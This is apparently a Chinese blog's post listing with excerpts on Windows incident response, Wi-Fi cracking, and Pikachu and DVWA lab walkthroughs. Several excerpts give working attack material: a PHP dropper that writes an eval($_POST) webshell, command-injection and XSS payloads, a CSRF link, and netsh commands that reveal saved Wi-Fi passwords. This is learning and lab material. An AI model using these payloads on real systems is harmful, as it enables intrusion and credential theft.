- 博客(115)
- 资源 (9)
- 收藏
- 关注
原创 查看连接过的wifi历史记录及密码
查看连接过的历史wifi及密码netsh wlan show profile 查看wifi历史记录netsh wlan show profile name=“北固湾” key=clear 查询某个wifi的密码netsh wlan export profile folder=C:\Users\Administrator\Desktop\wifi key=clear 批量导出wifi配置文件查看密码
2023-11-17 09:52:52 388
原创 QT5 WebCapture 页面定时截图工具
1.设置启动时间,程序会到启动时间后开始对网页依次进行截图2.根据所需截图的页面加载速度,设置页面等待时间,尽量达到等页面加载完成后,再执行截图3.根据需求,设置截图周期4.程序会使用默认浏览器打开页面进行截图,每轮截图完成后,便会根据默认浏览器进程名称关闭浏览器(防止留存大量页面导致系统卡顿)
2023-10-08 15:59:32 671
原创 windows应急整理
用工具直接在注册表里创建隐藏账号 就在compmgmt.msc 里面删除隐藏账号也没用 那个隐藏账号依旧存在。tasklist /svc | find “PID” 查找PID 对应的程序。taskkill /pid PID值 /T /F 结束进程以及创建的子进程。taskkill /pid PID值 /T 结束进程以及创建的子进程。%temp%查看 temp 目录下是否有异常文件。而且任务计划程序设置的不会在at 命令中显示。而at 设置的计划 会在任务计划程序里显示。任务计划程序 里面也是显示计划任务。
2023-06-19 16:06:48 1420
原创 C++ 模拟按下键盘的某个按键
keybd_event是Windows API中的一个函数,用于模拟键盘按键事件。因此,keybd_event(VK_DOWN, 0, 0, 0)的意思是模拟按下向下箭头键。需要注意的是,这段代码只在Windows平台上有效,且需要包含Windows.h头文件。第一个参数指定要模拟的键码,例如VK_DOWN表示向下箭头键。第三个参数指定按键事件的类型,0表示按下键,1表示释放键。第四个参数指定一个附加的32位值,通常也设置为0即可。第二个参数指定扩展键和状态标志位,通常设置为0即可。
2023-04-27 15:31:50 2423
原创 考研英语知识点
2.现在进行时 (Present Continuous Tense)4.过去进行时 (Past Continuous Tense)5.现在完成时 (Present Perfect Tense)1.一般现在时 (Simple Present Tense)9.将来完成时 (Future Perfect Tense)6.过去完成时 (Past Perfect Tense)3.一般过去时 (Simple Past Tense)7.将来时 (Future Tense)
2023-04-12 15:29:38 738
原创 无线安全检查方法
ifconfig ,发现wlan0变成wlan0man了(wlan0mon 为wlan0网卡开启的监听模式,wlan0mon就可以嗅探网络了)airodump-ng wlan0mon 进行wifi扫描,看看有哪些wifi。把这里的USB兼容性都点一遍,它会自动安装好,这样才可以识别到无线网卡。这个红框里显示的是连接到L440这个wifi的客户端(手机 ipad等)获取到握手包会在蓝色框显示,一直获取不到就用步骤6切断用户连接。虚拟机桥接或者NAT到物理机都可以,无所谓。
2023-03-15 17:54:39 921
原创 pikachu之SSRF
pikachu之SSRF概述SSRF(curl)看一下源代码,服务器会去请求传入的url,并把请求到的内容结果,输出到前端由于curl可以执行的不止是http协议,还有ftp,telnet等,这样就可以通过传入恶意的url参数,使用服务器的身份进行恶意操作...
2021-12-23 14:39:58 2629
原创 pikachu之URL重定向
pikachu之URL重定向点击不同的a标签,会跳转到不同的页面看一下源代码http://127.0.0.1/pikachu-master/vul/urlredirect/urlredirect.php?url=http://www.baidu.com将链接发送给别人,如果url=http://www.baidu.com是钓鱼网网站,那么点击的人就会中招,跳转到钓鱼网站...
2021-12-23 10:48:20 2005
原创 pikachu之Over permission
pikachu之Over permission水平越权登陆lucy的账号,在查看个人信息时,将username修改为lili,可以平行越权查看lili的个人信息垂直越权登陆管理员用户账号,抓取删除某用户的请求包退出登录,登陆普通用户的账号,并将上面删除用户的数据包,替换为普通用户的cookie,重放数据包,发现成功删除了用户名为2的用户...
2021-12-22 15:35:56 218
原创 pikachu之Unsafe Fileupload
pikachu之Unsafe Fileupload感觉有些混乱,但是就是总结为 改后缀,改image/png,图片马。。。。client check前端校验抓包改名绕过MIME type合成图片马filename改为php后缀getimagesize啥都验证了.就上传图片马,然后使用文件包含进行利用...
2021-12-22 15:07:19 2262
原创 pikachu之 File Inclusion
pikachu之 File Inclusion准备好一段创建一句话木马的php代码,后缀改为jpg<?php$mima="'".'ma'."'";touch ("testshell.php");$file = fopen("testshell.php","w");$write='<?php @eval($_POST['.$mima.']); ?>';echo fwrite($file,$write);fclose($file);echo "已经创建一句话php文件";
2021-12-10 16:25:49 1719
原创 pikachu之RCE
pikachu之 RCEexec "ping"输入 423.1.1.1 || systeminfo由于ping 423.1.1.1是错误的 所以 || 会执行systeminfo看一下源代码,没有过滤,直接进行拼接执行了然后把shell_exec执行的结果,输出到前端了exec "eval"看了下前端,没看出名堂看一下源码,发现直接把txt放到 eval里执行了输入 phpinfo();输入echo "123123";输入 echo '<script>aler
2021-12-08 17:30:37 107
原创 pikachu之CSRF
pikachu之CSRFCSRF(get)登陆后,进入修改个人信息界面,点击submit,看到发送的请求在受害者登陆的情况下,构造以下链接,若受害者点击了,便可以修改他的个人信息http://127.0.0.1/pikachu-master/vul/csrf/csrfget/csrf_get_edit.php?sex=boy&phonenum=18626545453&add=chain2222&email=vince%40pikachu.com&submit=su
2021-12-06 11:12:20 105
原创 pikachu之Cross-Site-Scripting
pikachu之Cross-Site-Scripting反射型xss(get)抓包情况使用123</p><script>alert(666)</script>可以完成闭合由于输入框的输入长度有限制,所以修改为100,或者直接在get参数里输入也可以弹窗反射性xss(post)先用admin/123456登陆一下系统,为了获得cookie,如果想要尝试,可以在xss完成后插入beef的恶意代码来获取cookie抓包查看使用123</p&
2021-11-23 11:40:48 3879
原创 pikachu之暴力破解
pikachu之暴力破解基于表单的暴力破解笛卡尔积模式爆破爆破完成验证码绕过(on server)图片验证码可以重复使用笛卡尔积模式爆破就可以爆破完成验证码绕过(on client)验证码是前端javascript生成并且前端校验后端对验证码不理睬的使用笛卡尔积模式爆破就可以爆破完成token防爆破抓包,发现有token,只有token正确,后端才对提交的用户名和密码进行校验相应包里面有token按照以下方式爆破,由于burpsuite功能设置,如
2021-11-01 17:16:20 109
原创 burpsuite的四种爆破模式
burpsuite的四种爆破模式准备字典1.txt和a.txt准备字典a.txtsniper模式对两个变量只可以设置一个字典逐一爆破两个变量,爆破一个,另一个值就是原始的那个不变Battering ram模式对两个变量只可以设置一个字典一炮双响Pitchfork模式两个变量可以选两个字典一一映射两个字典列数不一样时,就以短的字典长度为准,把1.txt长度增加为8,a.txt长度依旧为6爆破时,只对前6组进行匹配(以长度短的字典为准)Cluster b
2021-11-01 13:48:48 4950
原创 我的ajax测试 成功
123123.php<!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>菜鸟教程(runoob.com)</title> <script>function showSite(str){ if (window.XMLHttpRequest) { // IE7+, Firefox, Chrome, Opera, S
2021-05-02 14:16:45 104
原创 XSS闯关练习
XSS闯关练习第一关</h2><script>alert(111)</script>直接弹第二关有两个位置回显,但是其中一个位置对特殊字符做了转义,所以我们对另一个位置(input标签)下手111"><script>alert(123)</script>第三关...
2021-02-05 14:59:49 427
原创 dvwa之CSRF
dvwa之CSRF是一个修改密码的功能把密码修改为111111的请求数据包是这样的,请求链接为http://192.168.1.110/dvwa-master/vulnerabilities/csrf/?password_new=111111&password_conf=111111&Change=ChangeCSRF之low等级<?phpif( isset( $_GET[ 'Change' ] ) ) { // Get input $pass_new = $_G
2021-02-05 10:48:37 345
原创 dvwa之File Inclusion
dvwa之File Inclusion进行包含的文件名由get方法的page参数传递看一下包含的流程吧index.php<?phpdefine( 'DVWA_WEB_PAGE_TO_ROOT', '../../' );require_once DVWA_WEB_PAGE_TO_ROOT . 'dvwa/includes/dvwaPage.inc.php';dvwaPageStartup( array( 'authenticated', 'phpids' ) );$page =
2021-02-04 12:34:40 709
原创 dvwa之Weak Session IDs
dvwa之Weak Session IDsweak Session IDs之low等级<?php$html = "";if ($_SERVER['REQUEST_METHOD'] == "POST") { if (!isset ($_SESSION['last_session_id'])) { $_SESSION['last_session_id'] = 0; } $_SESSION['last_session_id']++; $cookie_value = $_SESSION
2021-02-04 10:45:24 172
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人